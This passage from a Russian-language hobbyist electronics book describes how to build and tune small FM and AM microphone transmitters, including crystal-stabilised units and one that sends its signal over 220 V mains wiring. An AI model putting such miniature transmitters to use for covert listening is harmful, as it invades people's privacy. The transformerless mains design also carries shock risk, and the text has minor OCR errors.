Настройка сводится к установке частоты задающего генератора, соответствующей свободному участку УКВ ЧМ диапазона, изменением емкости подстроечного конденсатора. Растяжением или сжатием витков катушки L2 настраивается передатчик на максимальную мощность ВЧ сигнала.

Радиопередатчик средней мощности с компактной рамочной антенной

Устройство работает в диапазоне 65-73 МГц с частотной модуляцией. Дальность действия при использовании рамочной компактной антенны составляет около 150 м. Продолжительность работы устройства при использовании батареек "Крона" составляет 30 ч. Принципиальная схем@ радиопередатчика представлена на рис. 2.11.

Низкочастотный сигнал микрофона М1 типа МКЭ-З, "Сосна" и др. усиливается двухкаскадным усилителем низкой частоты с непосредственными связями. Усилитель выполнен на транзисторах VT1 и VT2 типа КТЗ15. Режим работы усилителя устанавливается резистором R2.

Задающий генератор устройства выполнен на транзисторе VT3 типа КТЗ15. Частотозадающий контур подключается к базе транзистора VT3 через конденсатор С6 небольшой емкости. Конденсаторы С8, С9 образуют цепь обратной связи. Контур генератора состоит из индуктивности L1, конденсатора С5 и двух, включенных встречно, диодов типа КД102. Под действием модулирующего напряжения емкости диодов VD1, VK2 изменяются. Таким образом, осуществляется частотная модуляция передатчика. С выхода генератора модулированный .сигнал подается на усилитель мощности. Выходной усилитель выполнен на транзисторе VT4 типа КТЗ15. Он работает с высоким КПД в режиме класса "С". Усиленный сигнал поступает в рамочную антенну, выполненную в виде спирали. Спираль может быть любой формы, важно только, чтобы общая длина провода составляла 85-100 см, диаметр провода 1 мм.

Дроссели Др1, Др2 - любые, с индуктивностью около 30 мкГн. Катушки L1, L2, L3, L4, L5 - бескаркасные, диаметром 10 мм. Катушка L1 имеет 7 витков, L2 и L4 - по 4 витка, L3 и L5 - по 9 витков. Все катушки намотаны проводом ПЭВ 0,8 мм. Настройка передатчика особенностей не имеет.

Радиопередатчик УКВ ЧМ диапазона с дальностью действия 300 м

Этот передатчик при весьма малых размерах позволяет передавать информацию на расстоянии до 300 м. Прием сигнала может вестись на любой приемник УКВ ЧМ диапазона. Для питания может быть использован любой источник питания с напряжением 5-15 В. Схема передатчика приведена на рис. 2.12.

Задающий генератор передатчика выполнен на полевом транзисторе VT2 типа КП 303. Частота генерации определяется элементами L1, С5, С3, VD2. Частотная модуляция осуществляется путем подачи модулирующего напряжения звуковой частоты на варикап VD2 типа КВ109. Рабочая точка варикапа задается напряжением, поступающим через резистор R2 со стабилизатора напряжения. Стабилизатор включает в себя генератор стабильного тока на полевом транзисторе VT1 типа КП103, стабилитрон VD1 типа КС147А и конденсатор С2.

Усилитель мощности выполнен на транзисторе VT3 типа КТЗ68. Режим работы усилителя задается резистором R4. В качестве антенны используется отрезок провода длиной 15-50 см. Дроссели Др1 и Др2 могут быть любые, с индуктивностью 10-150 мГн. Катушки L1 и L2 наматываются на полистироловых каркасах диаметром 5 мм с подстроечными сердечниками 100 ВЧ или 50 ВЧ. Количество витков - 3,5 с отводом от середины, шаг намотки 1 мм, провод ПЭВ 0,5 мм. Вместо транзистора КП 303 можно использовать КП 302, КП 307. Настройка заключается в установке необходимой частоты генератора конденсатором С5, получения максимальной выходной мощности путем подбора сопротивления резистора R4 и подстройке резонансной частоты контура конденсатором С10.

Рис. 2.10 Радиопередатчик с широкополосной частотной модуляцией в диапазоне частот 65-108 МГц

Изображение: 

Рис. 2.11 Радиопередатчик средней мощности с компактной рамочной антенной

Изображение: 

Рис. 2.12 Радиопередатчик УКВ ЧМ диапазона с дальностью действия 300 м

Изображение: 

2.1.4. Радиопередатчики большой мощности

2.1.4. Радиопередатчики большой мощности

Мощный высокочастотный радиопередатчик с ЧМ в диапазоне частот 65-108 МГц

Устройство (рис. 2.13), описанное ниже, работает в диапазоне 65-108 МГц с частотной модуляцией. Дальность действия около 100 м при использовании компактной антенны. При использовании штыревой антенны дальность может достигать 500-600 м.

Сигнал от электретного микрофона М1 типа МКЭ-3 поступает на двухкаскадный низкочастотный усилитель с непосредственными связями на транзисторах VT1, VT2 типа КТЗ15. Рабочая точка усилителя устанавливается автоматически цепью обратной связи по постоянному току через R5, R6, С3. Усиленный низкочастотный сигнал с коллектора транзистора VT2 через фильтр низкой частоты на элементах R9, С4 и резистор R10 поступает на варикап VD1 типа КВ109, включенный в эмиттерную цепь транзистора VT3 типа КТ904.

Напряжение смещения на варикап VD1 задается коллекторным напряжением транзистора VT2. Однокаскадный ВЧ генератор выполнен на транзисторе VT3. Напряжение смещения на базе этого транзистора задается резистором R11. Транзистор VT3 включен по схеме с общей базой. В его коллекторной цепи включен контур С8, С9, L1. Частота настройки генератора определяется индуктивностью катушки L1 и емкостями С8, С5, VD1. Конденсатор С9 устанавливает глубину обратной связи, а конденсатор С10 согласует контур с антенной.

Все детали передатчика малогабаритные. Дроссель Др1 типа ДПМ 0,1 на 60 мкГн. Его можно заменить на самодельный, намотанный на резисторе МЛТ-0,25 сопротивлением более 100 ком проводом ПЭВ 0.1 100 витков. Катушка L1 - бескаркасная, с внутренним диаметром 8 мм, имеет 7 витков провода ПЭВ 0,8 мм. Компактная катушечная антенна выполнена тем же проводом, ее общая длина составляет 50 см. Катушка имеет диаметр 3 см. Если используется обычная антенна, то это провод или штырь длиной 0,75-1,0 м.

При настройке конденсатором С8 настраивают радиомикрофон на свободный участок УКВ ЧМ диапазона. Конденсаторами С9 и С10 настраивают генератор на максимальную дальность связи. Мощность передатчика составляет около 200 мВт. Если такая мощность не нужна, то ее легко понизить, увеличив вместе с тем срок службы источника питания. Для этого нужно увеличить сопротивление резистора R11 до 68-100 ком и заменить дроссель Др1 на постоянный резистор сопротивлением 180-330 Ом. Так как в этом случае мощность радиомикрофона будет около 10 мВт, то транзистор VT3 можно заменить на КТ315 или КТ3102. Транзисторы VT1, VT2 могут быть заменены на КТ3102, а транзистор VT3 - на КТ606, КТ907.

Для питания устройства используется батарея на 9 В типа "Крона", "Корунд" или аккумулятор 7Д-0,15.

В связи с тем, что мощные высокочастотные генераторы имеют низкую стабильность частоты, что приводит к ухудшению помеховой обстановки в целом, в данной главе более подробно описаны радиопередатчики большой мощности с кварцевой стабилизацией частоты (см. раздел 2.1.7).

Рис. 2.13 Мощный высокочастотный радиопередатчик

Изображение: 

2.1.5. Радиопередатчики малой мощности с повышенной стабильностью частоты

2.1.5. Радиопередатчики малой мощности с повышенной стабильностью частоты

Радиопередатчик с узкополосной ЧМ в диапазоне частот 140-150 МГц

Радиопередатчик, схема которого представлена на рис. 2.14, работает в диапазоне 140-150 МГц с узкополосной частотной модуляцией. Девиация частоты - 3 кГц. Частота задающего генератора стабилизирована кварцевым резонатором. В качестве акустического преобразователя используется электретный микрофон М1 с усилителем типа МКЭ-З, "Сосна", МЭК-1, и др. Питание на микрофон поступает через RC-фильтр, состоящий из резистора R1 и конденсатора С1. Напряжение звуковой частоты с выхода микрофона М1 через разделительный конденсатор С2 поступает на вход усилителя звуковой частоты (база транзистора VT1).

Усилитель звуковой частоты собран по двухкаскадной схеме с активными элементами на транзисторах VT1 и VT2 типа КТ315. Он усиливает и ограничивает звуковой сигнал до необходимой амплитуды. Режимы работы транзисторов VT1, VT2 по постоянному току устанавливаются путем подбора сопротивления резистора RЗ.

Заданный режим поддерживается далее автоматически с помощью обратной связи между транзисторами VT1 и VT2. Усиленный и ограниченный сигнал звуковой частоты через RC-фильтр низкой частоты, выполненный на резисторах К6, К8 и конденсаторе С4, поступает на варикап VD1 типа КВ109. Под действием переменного напряжения изменяется емкость варикапа VD1, осуществляя тем самым частотную модуляцию. Постоянное напряжение, снимаемое с коллектора транзистора VT2, задает начальное смещение на варикапе VD1. Задающий генератор выполнен на транзисторе VT3 типа КТЗ68, КТЗ101. Режим транзистора VT3 по постоянному току определяет резистор R9 в его базовой цепи. Кварцевый резонатор ZQ1 используется на частоту 47-49 МГц. Контур в коллекторной цепи транзистора VT3 настроен на частоту третьей гармоники используемого кварцевого резонатора. Высокочастотный сигнал поступает в антенну через конденсатор малой емкости С8. В качестве антенны используется отрезок провода длинной 40-50 см. Катушка L1 наматывается проводом ПЭВ 0,6 мм на корпусе подстроечного конденсатора С7 и содержит 3-4 витка.

Выводы катушки припаиваются к выводам конденсатора. Настройка усилителя звуковой частоты заключается в подборе сопротивления резистора КЗ так, чтобы получить на коллекторе транзистора VT2 напряжение, равное примерно половине напряжения источника питания. Контур L1, С7 настраивается по максимуму излучаемой мощности путем подстройки конденсатора С7.

Радиопередатчик с высокой стабильностью несущей частоты

При использовании кварцевого резонатора с высокой частотой появляется возможность создать простой радиомикрофон с высокой стабильностью несущей частоты. Ниже приведено описание подобного устройства. Радиомикрофон работает в диапазоне 61-74 МГц с частотной модуляцией.

Принципиальная схема передатчика радиопередатчика приведена на рис. 2.15.

Сигнал с микрофона М1 типа МКЭ-3 усиливается двухкаскадным усилителем на транзисторах VT1, VT2 типа КТ315. Задающий генератор выполнен на транзисторе VT3 типа КТЗ68. Частотная модуляция несущей частоты обеспечивается варикапом VD2. Резисторы R6 и R7 в базовой цепи транзистора VT3 определяют его режим по постоянному току.

Конденсатор С9 устанавливает необходимый режим генерации, обеспечивая положительную обратную связь. Стабильность частоты генератора зависит в основном от напряжения питания. Чтобы ее повысить, необходимо использовать стабилизатор на 6-9 В, что приведет к усложнению схемы. Стабилизировать частоту можно и другим способом. Если быть точным, то причина нестабильности несущей частоты определяется в основном колебаниями рабочей точки транзистора VT2 усилителя звукорой частоты при изменении напряжения питания. Положение этой рабочей точки определяет напряжение обратного смещения на варикапе VD2, а значит, и его начальную емкость. Для стабилизации рабочей точки усилителя на транзисторе VT2 в его базовую цепь включен резистор R4, напряжение на который поступает с параметрического стабилизатора, собранного на резисторе R2, светодиоде VD1 и конденсаторе С1. В устройстве использованы постоянные резисторы МЛТ-0,125, конденсаторы типов К50-16 и КМ.

Дроссели Др1, Др2 можно использовать стандартные, например, типа Д-0,1, с индуктивностью 15-30 мкГн или изготовить самостоятельно. Дроссели наматываются на резисторах МЛТ-0,25 сопротивлением более 100 ком и содержат 50-60 витков провода ПЭВ 0,1 мм. Контурная катушка L1 намотана на каркасе диаметром 8 мм и содержит 6 витков провода ПЭВ 0,8 мм. Катушка L2 намотана на том же каркасе и тем же проводом, что и катушка L1. Катушка L2 содержит 3 витка, размещенных на расстоянии 1 мм от витков катушки L1. Антенна выполнена следующим образом: отрезок 50-омного кабеля длиной 10-12 см зачищается от изоляции и удаляется центральная жила. По всей длине отрезка кабеля наматывается виток к витку провод ПЭВ-0,6 - антенна готова. В крайнем случае в качестве антенны можно использовать провод длиной 30-50 см.

Настройку начинают с усилителя звуковой частоты. Изменением сопротивления резистора R4 устанавливают напряжение на коллекторе транзистора VT2, равное половине напряжения источника питания. Емкость конденсатора С9 необходимо подобрать по максимуму тока, потребляемому генератором, а затем резистором К6 установить этот ток около 10 мА.

Рис. 2.14 Радиопередатчик с узкополосной ЧМ в диапазоне частот 140-150 МГц

Изображение: 

Рис. 2.15 Принципиальная схема передатчика радиопередатчика в диапазоне 61-74 МГц с частотной модуляцией.

Изображение: 

2.1.6. Радиопередатчик средней мощности с повышенной стабильностью частоты

2.1.6. Радиопередатчик средней мощности с повышенной стабильностью частоты

Радиопередатчик с высокой стабильностью частоты задающего генератора

Большинство любительских радиопередатчиков выполнены по схемам с колебательным контуром в частотозадающей цепи. При этом они имеют, как правило, один высокочастотный каскад. Этот каскад выполняет одновременно роль задающего генератора и усилителя мощности. Такие схемы при своей простоте и миниатюрности готовой конструкции имеют и свои недостатки. Это большая нестабильность колебаний высокой частоты и маленькая выходная мощность.

Схема, приведенная на рис. 2.16, лишена этих недостатков, т. к. частота задающего генератора предлагаемого устройства стабилизируется кварцевым резонатором и имеет отдельный усилитель мощности. Данное устройство работает в диапазоне УKB ЧМ с частотной модуляцией, т. е. его сигнал может быть принят на любой приемник диапазона 65-108 МГц. Дальность действия составляет около 300 м.

Задающий генератор выполнен на транзисторе VT1 типа КТЗ68. В данной схеме могут быть использованы кварцевые резонаторы на частоты 22-36 МГц. Контур, состоящий из катушки L1 и конденсатора С7 настраивается на третью гармонику кварцевого резонатора.

Предпочтительнее использовать резонатор, настроенный на третью гармонику последовательного резонанса, т. к. при этом легче получить необходимую для нормальной работы приемника девиацию частоты 50 кГц. Кварцевый резонатор подключен к базе транзистора VT1 и варикапу VD1 и работает по осцилляторной схеме, составляя с емкостью С5 и контуром "емкостную трехточку", что обеспечивает высокую стабильность частоты.

Модулирующий усилитель выполнен на операционном усилителе DA1 типа КР1407УД2. На его вход поступает изкочастотный звуковой сигнал от электретного микрофона М1 со встроенным усилителем типа МКЭ-З. Операционный усилитель обеспечивает на выходе неискаженное напряжение звуковой частоты с амплитудой около 3 В, что достаточно, при использовании в качестве модулирующего элемента варикапа типа КВ104А для достижения девиации частоты около 4050 кГц. Режим работы операционного усилителя задается резисторами R1, R4, и R3. Микросхему DA1 можно заменить на К140УД1208, КР140УД608 - в последнем случае резистор R3 можно из схемы исключить. Промодулированный по частоте сигнал с контура задающего генератора L1, С7 через катушку связи L2 поступает на вход усилителя мощности, выполненного на транзисторе VT2 типа КТ610А. Усилитель мощности работает с высоким КПД в режиме класса "С". Он усиливает сигнал до 150 мВт. Поэтому при использовании вместо висячей или штыревая антенны длиной в 1 м катушки L3 диаметром З см (рис. 2.17), содержащей 7 витков провода ПЭВ 0,8, получается эффективность не хуже стандартного варианта с проводом длиной в 1 м и мощностью около ЗОмВт. Такой мощности вполне достаточно для устойчивого приема на расстоянии до 150 м. Длина намотки катушки L3 - 5 см.

В конструкции использованы резисторы МЛТ-0,125 , конденсаторы типа КТ, КД, К50-35. Дроссель Др1 намотан на резисторе МЛТ-0,25 сопротивлением более 100 ком. Он содержит 60 витков провода ПЭВ 0,1 мм. Катушки L1 и L2 намотаны на полистироловом каркасе диаметром 5 мм с латунным подстроечником. Катушка L1 (рис. 2.16) содержит 10 витков провода ПЭВ 0,31 мм, катушка L2 - 5 витков того же провода. Конструкция катушки L3 показана на рис. 2.17.

Настройка низкочастотной части передатчика особенностей не имеет. Передатчик настраивают по общепринятой методике с использованием индикатора напряженности поля и контрольного радиоприемника. Контур С7, L1 настраивают таким образом, чтобы обеспечить устойчивость генерации задающего каскада. При подключении отрезка провода длиной около 1 м к точке А антенны, предварительно отсоединив емкости С10, С11 и L3, по измерительным приборам добиваются выходной мощности передатчика около 150 мВт. Такой мощности достаточно для того, чтобы принимать сигнал на приемник с чувствительностью 5 мкВ/м на расстоянии до 500 мв городских условиях.

Радиопередатчик повышенной мощности без дополнительного усилителя мощности

От предыдущих устройств предлагаемый радиопередатчик отличается конструкцией задающего генератора, позволяющей получить повышенную мощность излучения без использования дополнительного усилителя мощности.

Радиопередатчик (рис.2.18) работает на частоте 27-28 МГц с амплитудной модуляцией. Частота несущей стабилизирована кварцем, что позволяет увеличить дальность связи при использовании приемника с кварцевой стабилизацией частоты. Питается устройство от источника питания напряжением 3-4,5 В. Усилитель звуковой частоты выполнен на транзисторе VT1 типа КТ315. Для питания микрофона и задания режимов по постоянному току транзисторов VTI, VT2, VT3 используется параметрический стабилизатор напряжения на резисторе R2, светодиоде VD1 и конденсаторе С1. Напряжение 1,2 В поступает на электретный микрофон с усилителем М1 типа МКЭ-З, "Сосна" и др. Напряжение звуковой частоты с микрофона М1 через конденсатор С2 поступает на базу транзистора VT1. Режим работы этого транзистора по постоянному току задается резистором R1. Усиленный сигнал звуковой частоты, снимаемый с коллекторной нагрузки транзистора VT1 - резистора R3, через конденсатор СЗ поступает на задающий генератор, осуществляя тем самым амплитудную модуляцию передатчика. Задающий генератор передатчика собран на двух транзисторах VT2 и VT3 типа КТЗ15 и представляет собой двухтактный автогенератор с кварцевой стабилизацией в цепи обратной связи.

Контур, состоящий из катушки L1 и конденсатора С5, настроен на частоту кварцевого резонатора ZQ1. Контур, состоящий из катушки L2 и конденсатора С7, предназначен для согласования антенны и передатчика.

В устройстве применены резисторы МЛТ-0,125. Конденсаторы использованы на напряжение более 6,3 В. Транзистор VT1 можно заменить на любой n-p-n транзистор, например, на КТ3102, КТ312. Транзисторы VT2, VT3 можно заменить на КТ3102, КТ368 с одинаковым коэффициентом передачи по току. Хороший результат можно получить при использовании микросхемы КР159НТ1, представляющей собой пару идентичных транзисторов.

Контурные катушки намотаны на каркасе диаметром 5 мм, имеющем подстроечный сердечник из карбонильного железа диаметром 3,5 мм. Намотка катушек ведется с шагом 1 мм. Катушка L1 имеет 4+4 витка, катушка L2 - 4 витка. Обе катушки намотаны проводом ПЭВ 0,5. Дроссель Др1 имеет индуктивность 20-50 мкГн. В качестве антенны используется провод длиной около 1 м.

В качестве источника питания можно использовать одну плоскую батарею КБС-4,5 В или четыре элемента-типа А316, А336, А343.

Светодиод VD1 типа АЛЗ07 можно заменить любым другим или использовать аналог низковольтного стабилитрона с малым током стабилизации (рис. 2.19).

Настройку передатчика начинают с установки режимов транзисторов VT2 и VT3 по постоянному току. Для этого подключают миллиамперметр в разрыв цепи питания в точке А и подбирают величину сопротивления резистора R4 такой, чтобы ток был равен 40 мА.

Настройку контуров L1, L2, С5, С7 проводят по максимуму ВЧ излучения. Причем грубо на рабочую частоту настраивают конденсаторами, а точнее - сердечником катушки. Подстроечник катушек L1, L2 должен находиться на расстоянии не более чем 3 мм от центра катушек, т. к, в крайних его положениях генерация может срываться из-за нарушения симметрии плеч транзисторов VT2, VT3.

Рис. 2.16 Радиопередатчик, частота задающего генератора которого стабилизирована кварцевым резонатором

Изображение: 

Рис. 2.17 Конструкций катушки

Изображение: 

Рис. 2.18 Радиопередатчик повышенной мощности без дополнительного усилителя мощности

Изображение: 

Рис. 2.19 Примеры использования различных электронных приборов в качестве опорного элемента параметрического стабилизатора напря

Изображение: 

2.1.7. Радиомикрофоны большой мощности с повышенной стабильностью частоты

2.1.7. Радиомикрофоны большой мощности с повышенной стабильностью частоты

Радиопередатчик с фиксированной частотой задающего генератора

Передатчик работает на фиксированной частоте, определяемой частотой кварцевого резонатора в его задающем генераторе.

Характеристики передающего тракта:

  • несущая частота передачи ......145,68 МГц
  • девиация частоты ........................... 6 кГц
  • номинальная выходная мощность 0,7 Вт
  • напряжение источника питания ........9 В

Принципиальная схема передатчика показана на рис. 2.20.

В данной схеме используется модулирующий усилитель с электретным микpофоном со встpоенныс усилителем. С целью повышения pазбоpчивости речи применяется частотная и амплитудная коррекция низкочастотного сигнала. Сигнал от микрофона поступает на неинвертирующий вход операционного усилителя DA1. В данной схеме используется однополярное питание. Для того чтобы операционный усилитель мог работать, на этот его вход поступает напряжение смещения, равное половине напряжения питания, создавая среднюю точку двуполярного источника. Напряжение задается резисторами R1, R2, R3.

В цепи обратной связи операционного усилителя включена комбинированная цепь связи по постоянному току. При слабом и нормальном сигнале от микрофона напряжение на выходе операционного усилителя невелико, и диоды VD1 и VD2 закрыты. При превышении выходным сигналом определенного уровня диоды открываются, что приводит к включению в обратной связи дополнительного резистора R5. Коэффициент ООС увеличивается и коэффициент передачи ОУ уменьшается. Таким образом работает компрессор, корректирующий входной сигнал по амплитуде. Кроме того, в цепи ООС включены частотно-зависимые цепи на элементах R6-R8 и С5-С7, которые превращают модуляционный усилитель в активный фильтр и выделяют полосу частот от 450 Гц до 2500 Гц, отфильтровывая нежелательные помехи по низкой и высокой частоте.

С выхода операционного усилителя через фильтрующую цепочку на резисторах R9 и R10 напряжение звуковой частоты поступает на варикапы VD3 и VD4. Напряжение на варикапах изменяется в соответствии с сигналом звуковой частоты, изменяя их емкость.

Варикапы включены последовательно в емкостной делитель в цепи обратной связи кварцевого генератора, и, следовательно, при его возбуждении частота генератора будет изменяться в соответствии с изменением амплитуды звукового сигнала. Задающий генератор выполнен на транзисторе VT1. Кварцевый резонатор включен в цепь базы транзистора и возбуждается на частоте последовательного резонанса.

В данном случае используется резонатор с основной частотой возбуждения 24, 28 МГц. В коллекторном контуре транзистора VT1 выделяется утроенное значение частоты - 72, 84 МГц. Контур L1, С15 настроен на третью гармонику резонатора. С катушкой этого контура индуктивно связан вход парафазного балансного удвоителя частоты, работающего на четных гармониках. Удвоитель выполнен на транзисторах VT2 и VT3, коллекторы которых соединены вместе, а базы подключены к включенным противофазно катушкам L2.1 и L2.2.

Полосовой фильтр на элементах L4, С17 и L3, С19 на выходе удвоителя выделяет напряжение частотой 145,68 МГц, которое с части витков катушки L3 поступает на вход предварительного каскада усилителя мощности на транзисторе VT4. Он работает в режиме А-В с небольшим напряжением смещения, получаемым от параметрического стабилизатора напряжения, выполненного на кремниевом диоде VD7, включенном в прямом направлении (по схеме стабистора). Усиленное напряжение выделяется в коллекторной цепи VT4 и через С25 поступает в антенну. Антенной передатчика служит четвертьволновый вибратор с эквивалентным сопротивлением 75 Ом.

Конденсаторы постоянной емкости могут быть любые типа КМ и КЛ, КТ. В контурах нужно устанавливать конденсаторы с минимальным ТКЕ. Электролитические конденсаторы типа К53-14, но можно использовать и К50-35, и другие малогабаритные. Операционный усилитель можно заменить на К140УД708, К140УД6, КР140УД2, К140УД7, К140УД8 или К140УД12. Вместо транзистора КТ315 можно использовать любой с граничной частотой не менее 300 МГц, например, КТ312, КТ316 или КТ368. Транзистор выходного каскада передатчика КТ610 можно заменить на КТ913, КТ925.

Для катушек индуктивности L1 и L2 передатчика использованы пластмассовые каркасы диаметром 5мм, предназначенные для вертикальной установки (на одном торце имеется прямоугольная площадка для пяти выводов). Каркас имеет подстроечный сердечник из феррита 20ВЧ. При отсутствии такого сердечника можно от него отказаться, и параллельно конденсатору С15 со стороны монтажа припаять подстроечный керамический конденсатор. Катушка L1 имеет 10 витков, L2 - 6-1-6 витков. Использован провод ПЭВ-2 0,31.

Остальные катушки передатчика бескаркасные, они наматываются на оправках, которые затем удаляются. Диаметр всех катушек 5 мм, L3 содержит 1.5+3.5 витков, L4 - 5 витков. Все катушки намотаны проводом ПЭВ-2 1,0 мм. Длина намотки катушек L3 и L5 - 8 мм, L4 - 9 мм. Более точно размеры катушек устанавливаются при настройке.

Настройку передатчика после проверки правильности монтажа начинают с настройки контуров при помощи резонансного волномера. В начале перемещением сердечника L1 добиваются максимальной амплитуды напряжения с частотой 72-73 МГц в контуре L1, С15. Затем последовательно настраивают контуры L4, С17 и L3, С19 по максимуму напряжения 144-146 МГц. Дополнительно при настройке контуров нужно подобрать номинал R12 таким образом, чтобы имелось максимальное выходное напряжение передатчика. Утроитель на VT2 и VT3 балансируют переменным резистором R15 по максимальному подавлению напряжения 72-73 МГц на его выходе. Настройка низкочастотного тракта передатчика сводится только к проверке работоспособности. В небольших пределах частоту несущей передатчика можно изменять подстройкой С9.

Радиопередатчик большой мощности с кварцевой стабилизацией частоты

Рассмотрим схему еще одного радиопередатчика с кварцевой стабилизацией частоты задающего генератора. Принципиальная схема передающего тракта изображена на рис. 2.21.

Основные технические характеристики радиопередатчика следующие:

  • выходная мощность передатчика ................... 0,5 Вт;
  • диапазон звуковых частот по уровню -3 дБ .... 300-3000 Гц;
  • ширина полосы излучения по уровню -30 дБ, не более 11 кГц;
  • девиация частоты при максимальной модуляции около 2.5 кГц;
  • ток потребления, не более..................90 мА;
  • напряжение источника питания ................. 9 В

Сигнал от конденсаторного микрофона со встроенным усилителем (М1) поступает на прямой вход операционного усилителя DA1. К этому входу подключен делитель напряжения на резисторах R2 и R3, который создает половину напряжения питания на этом входе, и таким образом позволяет ОУ работать с однополярным питанием.

Между инвертирующим входом п выходом включена цепь R7, С5, С6, которая создает нужный коэффициент усиления и частотную характеристику усилителя. Этот усилитель работает как компрессор речевого сигнала, сжимая его динамический диапазон за счет каскада на транзисторе VT1. Выходное напряжение ЗЧ усилителя детектируется диодами VD1 и VD2 в постоянное напряжение, отрицательное, которое воздействует на затвор транзистора VT1 и с увеличением уровня звукового сигнала увеличивает сопротивление канала этого транзистора.

В результате шунтирования инвертирующего входа конденсатором С6 изменяется коэффициент отрицательной обратной связи, что приводит к изменению коэффициента усиления ОУ. Выходное напряжение ОУ, равное половине напряжения питания, поступает через резисторы R1 и R12 на катоды варикапов VD3. Модулирующее напряжение ЗЧ изменяется на катоде варикапов относительно этого напряжения смещения.

Варикапная матрица VD3 включена между кварцевым резонатором и общим проводом. Изменение емкости варикапа приводит к некоторому изменению частоты резонатора. В этом процессе играет роль и индуктивность катушки L1.

На транзисторе VT2 выполнен задающий генератор, частота в коллекторном контуре которого определяется включенным резонатором, индуктивностью L1 и емкостью VD3. Контур L2, С13 в коллекторной цепи этого транзистора настроен на середину выбранного диапазона, и на нем выделяется частотно-модулированное напряжение ВЧ с частотой резонатора Q1. Это напряжение через катушку связи L3 поступает на выходной каскад, выполненный на транзисторе VT3. Катушка включена в цепь смещения базы этого транзистора - К17, К18, которая создает рабочую точку выходного каскада. Усиленное и модулированное по частоте напряжение ВЧ выделяется на коллекторе VT3. Затем через ФНЧ и удлинительную катушку это напряжение поступает в антенну. ФНЧ на катушке и и конденсаторах С16 и С17 служит для подавления гармоник и согласования выходного сопротивления каскада на транзисторе VT3 с входным сопротивлением антенны, катушка L5 вводит дополнительную индуктивность в цепь антенны и таким образом увеличивает ее эквивалентную длину, приближая к четвертьволновой. В результате отдача сигнала в антенну увеличивается. Конденсатор С19 исключает выход из строя транзистора VT3 от случайного замыкания антенны с общим проводом или цепью питания.

Все высокочастотные катушки передатчика выполнены на одинаковых каркасах диаметром 7 мм с сердечниками из феррита 100 ВЧ диаметром 2,8 мм. Катушка передатчика L2 имеет 6 витков, L3 - 3 витка, и - 8 витков, L5 - 20 витков провода ПЭВ 0,2. Катушка L1 - дроссель ДМ-0,06 16 мкГн. Настройку передатчика производят традиционным способом, контролируя вырабатываемую им напряженность поля при помощи волномера или ВЧ осциллографа с проволочной рамкой на входе.

Рис. 2.20 Радиопередатчик с фиксированной частотой задающего генератора

Изображение: 

Рис. 2.21 Радиопередатчик большой мощности с кварцевой стабилизацией частоты задающего генератора

Изображение: 

2.1.8. Радиопередатчик с питанием от сети 220 В

2.1.8. Радиопередатчик с питанием от сети 220 В

Радиопередатчик с AM в диапазоне частот 27-30 МГц

Устройство, описанное ниже, работает в диапазоне 27-30 МГц с амплитудной модуляцией несущей частоты. Основное достоинство заключается в том, что оно питается от электросети. Эту же сеть оно использует для излучения сигнала высокой частоты. Приемник принимает сигнал, используя телескопическую антенну или специальный сетевой адаптер. Схема радиопередатчика приведена на рис. 2.22.

Задающий генератор собран на транзисторе VT2 типа КТ315 по традиционной схеме. Для питания микрофона М1 применен параметрический стабилизатор напряжения, собранный на резисторе R1 и светодиоде VD1, включенном в прямом направлении, на аноде которого поддерживается напряжение 1,2-1,4 В. На транзисторе VT1 типа КТЗ15 собран УЗЧ, сигнал с которого модулирует по амплитуде задающий генератор. Постоянное напряжение на коллекторе транзистора VT1 является напряжением смещения для транзистора VT2. Промодулированный ВЧ сигнал с катушки связи L2 через конденсатор С9 поступает в электросеть. В данном случае провода электросети выполняют роль антенны. Источник питания собран по бестрансформаторной схеме. Дроссель Др1 предотвращает проникновение ВЧ колебаний в источник питания. На реактивном сопротивлении конденсатора С8 гасится излишек сетевого напряжения. В отличие от резистора, конденсатор не нагревается и не выделяет тепло, что благоприятно сказывается на режиме работы устройства. Выпрямитель собран на диодах VD3, VD4. Конденсатор С7 сглаживает пульсации выпрямленного напряжения. Далее напряжение через параметрический стабилизатор, собранный на резисторе R5 и стабилитроне VD2, поступает для питания радиомикрофона.

Конденсатор С6 уменьшает пульсации выпрямленного напряжения. Такой блок питания обеспечивает стабильную работу радиомикрофона при изменениях сетевого напряжения в интервале от 80 до 260 В. Микрофон М1 - любой малогабаритный конденсаторный микрофон со встроенным усилителем ( МКЭ-З , М1-Б, "Сосна" и др.). Конденсаторы С8 и С9 должны быть рассчитаны на рабочее напряжение не менее 250 В. Дроссель Др1 типа ДПМ-0,1 номиналом 50-90 мкГн. Дроссель Др1 может быть изготовлен самостоятельно. Он содержит 100-150 витков провода ПЭВ 0,1 мм на стандартном ферритовом сердечнике диаметром 2,8 мм и длиной 14 мм (длина сердечника может быть уменьшена в 2 раза). Катушки L1 и L2 намотаны на стандартных ферритовых стержнях диаметром 2,8 мм и длинной 14 мм проводом ПЭВ 0,23. Катушка L1 - 14 витков, L2 - 3 витка поверх и.

Транзистор VT2 может быть заменен на КТЗ102 или КТЗ68. Светодиод VD1 - на любой светодиод. Диоды VD3, VD4 заменяются на КД105 нли другие на напряжение не ниже 300 В. Конденсаторы С6 и С7 могут быть большей емкости и на большее рабочее напряжение, они должны иметь минимальную утечку. Стабилитрон VD1 может быть заменен на любой стабилитрон с напряжением стабилизации 8-12 В.

Схема сетевого адаптера представлена на рис. 2.23.

Конденсатор С1 исключает проникновение напряжения сети в катушку L1 и на вход используемого приемника. Катушки L2, L3, L4 и конденсаторы С2, СЗ, С4 образуют двухконтурный ФСС. С катушки L4 отфильтрованный сигнал поступает на вход приемника.

Катушки L1, L2, L3, L4 намотаны на каркасах от КБ катушек переносных радиоприемников. Катушка L1 имеет 2 витка, L2 - 14 витков, L3 - 14 витков, L4 - 5 витков. Все катушки намотаны проводом ПЭВ 0,23. Конденсатор С1 - на напряжение не ниже 250В, конденсаторы С2 и С4 - подстроечные.

Настройку устройства следует начинать с проверки напряжения питания. Для этого необходимо сделать разрыв в точке А. Напряжение на конденсаторе С6 должно быть 9 В. Если напряжение отличается от указанного, следует проверить исправность элементов блока питания Др1, С8, VD3, VD4, С7, К5, VD2, С6.

При исправном блоке питания следует восстановить соединение и точке А и подбором сопротивления резистора R2 установить напряжение на базе транзистора VT2 равным 3,5 В. Дальнейшая настройка сводится к установке несущей частоты подстройкой контура перемещением сердечника катушек L1, L2. Настроенную схему нужно залить эпоксидной смолой, предварительно отгородив микрофон.

Настройка адаптера сводится к настройке контуров L2, С2 и L3, С4 на частоту передатчика.

